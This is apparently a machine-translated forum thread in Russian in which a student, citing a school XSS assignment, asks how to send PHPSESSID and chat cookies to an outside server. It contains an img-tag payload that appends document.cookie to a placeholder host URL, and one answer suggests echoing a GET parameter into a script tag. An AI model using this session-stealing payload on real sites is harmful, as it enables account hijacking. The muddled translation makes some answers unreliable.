Я хотел бы передать переменную как ценность для веб-сайта. (Выполнение школьного задания на XSS)
Например, у меня в настоящее время есть: $.cookie('echat') и $.cookie('PHPSESSID')
Я хотел бы передать его в ссылку: xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID ')
Однако ничего не происходит в xxxx.com/xxx.php
Any1 знаю синтаксис для этого?
в частности, я размещаю тег img, как это, чтобы использовать:
& lt img src= ' http://xxxxx.com/xxxxx.php?cookie= ' +document.cookie & gt;
По-видимому, document.cookie не работает, и мне нужно $.cookie('PHPSESSID'), чтобы получить PHPID
Ваш URL-адрес устанавливает значение $_GET['cookie']
в $.cookie('PHPSESSID')
в вашем скрипте PHP, не более того. Как это обрабатывается до PHP.
Поскольку это похоже на JavaScript (в частности, плагин jQuery Cookie), вы могли бы, возможно, сделать echo "<script>{$_GET['cookie']}</script>";
в вашем PHP, чтобы выплюнуть его как JS на результирующей странице. Как вы, надеюсь, знаете из своих классов, слепо использовать данные, представленные пользователем, это опасно и плохая идея.
используйте эту функцию php
url_encode("string")
такие как
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>
.
в имени вашей переменной?